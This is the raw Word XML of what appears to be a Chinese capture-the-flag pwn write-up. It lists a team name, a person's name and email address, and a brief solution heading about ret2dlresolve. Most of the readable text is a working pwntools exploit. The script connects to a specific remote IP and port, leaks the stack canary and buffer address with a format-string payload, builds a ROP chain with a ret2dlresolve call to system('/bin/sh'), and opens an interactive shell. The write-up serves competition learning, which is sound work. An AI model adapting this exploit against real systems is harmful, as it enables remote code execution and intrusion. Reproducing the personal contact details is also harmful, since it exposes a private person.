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5DA6EC66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</w:p>
    <w:p w14:paraId="17C9F607" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Whooops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+李卓航+925798691@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DFA74" w14:textId="73ECDC75" w:rsidR="00AF064E" w:rsidRDefault="00A53948" w:rsidP="001043FF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00026849">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E31F60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="177F71F8" w:rsidR="00AF064E" w:rsidRPr="00AF064E" w:rsidRDefault="00AF064E" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03034674" w14:textId="040D3AEC" w:rsidR="00AF064E" w:rsidRDefault="00A53948" w:rsidP="00944EC9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D08D6C" w14:textId="3BEF007C" w:rsidR="00AF064E" w:rsidRDefault="00A53948" w:rsidP="000268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et2dlresolve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79878D88" w14:textId="67C7F37F" w:rsidR="00AF064E" w:rsidRPr="006D7CD7" w:rsidRDefault="00AF064E" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="006D7CD7">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03643528" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3657EF09" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849"/>
    <w:p w14:paraId="667A0C40" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t># 设置日志级别和架构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7334E73C" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>context.log_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F97EFE4" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>context(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">arch='i386', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DAEADA" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>context.terminal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>splitw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', '-h']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73706BAF" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849"/>
    <w:p w14:paraId="3AE00525" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t># 目标程序路径和远程连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F323DEC" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_binary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057E6CA4" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t xml:space="preserve">p = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'182.92.237.102', 10012)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1A8440" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849"/>
    <w:p w14:paraId="3A507FB0" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t># 发送payload获取canary和buffer地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3F671E" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("what's the content?", "%19$p%6$p./flag\x00\x00")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4463BE1E" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("0x")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41816508" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t>canary = int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(8), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0DBF79" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("0x")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56773715" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(7), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36890E53" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t>print(hex(canary))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F75CFF" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t>print(hex(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B76A1F" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849"/>
    <w:p w14:paraId="656EE5AD" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t># 构造ROP链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6E0373" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ROP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>target_binary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1987384F" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rop.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rop.find_gadget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(['pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', 'ret']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7387E6E5" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>rop.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0x0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB1C1DF" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rop.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rop.find_gadget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(['pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', 'ret']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21676A65" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rop.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to buffer address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17696B20" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rop.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rop.find_gadget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(['pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', 'ret']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423F7A93" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rop.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0x0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E2BFA" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rop.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rop.find_gadget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(['pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', 'ret']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F9CFBE" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rop.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0x0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA36F29" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rop.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rop.find_gadget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(['int 0x80']))  # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BEC4824" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rop.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>canary)  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Add padding to adjust for canary overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42987B86" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849"/>
    <w:p w14:paraId="6EC7937A" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t># 获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dlresolve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79719A51" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t xml:space="preserve">elf = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ELF(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>target_binary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1639FDF4" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dlresolve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = Ret2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dlresolvePayload(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">elf, symbol='system', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=['/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D03C1A" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rop.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">(0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dlresolve.data_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E8FB4" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rop.ret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2dlresolve(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dlresolve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FBD98F" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>raw_rop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rop.chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D635BE" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849"/>
    <w:p w14:paraId="55D877FD" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t># 发送payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C800710" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t xml:space="preserve">payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">' * (0x94 - 0xc) + p32(canary) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">' * 12 + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>raw_rop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="069BEF12" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t xml:space="preserve">payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>payload.ljust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">(256) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dlresolve.payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="272F3B90" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t>pause()  # 暂停程序执行，方便调试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0CDBBA" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("Input:", payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A56554C" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849"/>
    <w:p w14:paraId="1D131F93" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:t># 进入交互模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A01A4B" w14:textId="01AF1183" w:rsidR="00EA3779" w:rsidRPr="00EA3779" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EA3779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5008A" w14:textId="77777777" w:rsidR="00216943" w:rsidRDefault="00216943" w:rsidP="00944EC9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7FBDDB39" w14:textId="77777777" w:rsidR="00216943" w:rsidRDefault="00216943" w:rsidP="00944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28F35" w14:textId="77777777" w:rsidR="00216943" w:rsidRDefault="00216943" w:rsidP="00944EC9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0C4ECE9A" w14:textId="77777777" w:rsidR="00216943" w:rsidRDefault="00216943" w:rsidP="00944E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2E6F0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37ECE754"/>
    <w:lvl w:ilvl="0" w:tplc="2A544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25359777">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1670399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26849"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="00216943"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="00944EC9"/>
    <w:rsid w:val="009D2552"/>
    <w:rsid w:val="00A53948"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00C850A0"/>
    <w:rsid w:val="00E31F60"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00E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944EC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4E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4EC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4E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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-01T15:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>